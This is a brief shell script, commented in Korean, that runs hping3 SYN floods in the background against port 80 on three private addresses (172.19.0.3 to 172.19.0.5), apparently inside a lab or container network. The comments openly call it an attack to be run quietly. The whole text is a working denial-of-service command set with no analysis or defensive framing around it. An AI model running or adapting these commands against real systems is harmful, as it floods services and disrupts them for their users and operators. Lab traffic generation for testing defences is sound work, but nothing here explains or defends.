# 백그라운드로 조용히 공격 실행
hping3 -S -p 80 -i u1000 -c 1000 172.19.0.3 &
hping3 -S -p 80 -i u1000 -c 1000 172.19.0.4 &
hping3 -S -p 80 -i u1000 -c 1000 172.19.0.5 &

# 모든 백그라운드 작업이 끝날 때까지 대기
wait

